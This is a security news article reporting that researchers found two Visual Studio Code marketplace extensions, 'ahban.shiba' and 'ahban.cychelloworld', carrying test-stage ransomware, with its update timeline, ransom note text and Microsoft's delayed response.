Security researchers at ReversingLabs have uncovered a significant security breach in the Visual Studio Code marketplace, where two extensions were found containing hidden ransomware capabilities. The compromised extensions, identified as “ahban.shiba” and “ahban.cychelloworld,” managed to evade detection for several months, highlighting critical vulnerabilities in the marketplace’s security verification process.
Technical Analysis of the Malicious Extensions
The investigation revealed that both extensions leveraged sophisticated PowerShell commands to retrieve and execute malicious scripts from an Amazon AWS remote server. Analysis indicates that the ransomware was in its testing phase, with encryption capabilities deliberately limited to a specific directory: C:\users\%username%\Desktop\testShiba, suggesting a controlled proof-of-concept deployment.
Infection Timeline and Evolution
The threat emerged when “ahban.cychelloworld” was published on October 27, 2024, followed by “ahban.shiba” on February 17, 2025. According to ExtensionTotal researcher Itali Kruk, the initial version of ahban.cychelloworld was clean, but malicious code was introduced through version 0.0.2 on November 24, 2024. Subsequently, five more updates containing malicious payloads were pushed to users.
Ransomware Characteristics and Behavior
The malware’s experimental nature was evident in its simplified ransom demand, which displayed the message: “Your files are encrypted. Pay 1 ShibaCoin to ShibaWallet to restore them.” Unlike sophisticated ransomware strains, this variant lacked detailed payment instructions or communication channels, further supporting the assessment of its developmental status.
Security Implications and Response
Despite automated security scanning detecting the threat shortly after the malicious code’s introduction, Microsoft’s response was notably delayed. The extensions’ low installation base (7-8 downloads) may have contributed to the delayed reaction, though security experts emphasize that installation metrics should not influence the urgency of security responses.
This security incident exposes significant vulnerabilities in the VSCode Marketplace’s extension verification process, particularly concerning update validation. To enhance marketplace security, experts recommend implementing stricter code review procedures, establishing real-time malware detection systems, and developing rapid response protocols for all security threats, regardless of their apparent impact scale. Organizations utilizing VSCode are advised to implement strict extension approval processes and regularly audit their development environments for potential security compromises.
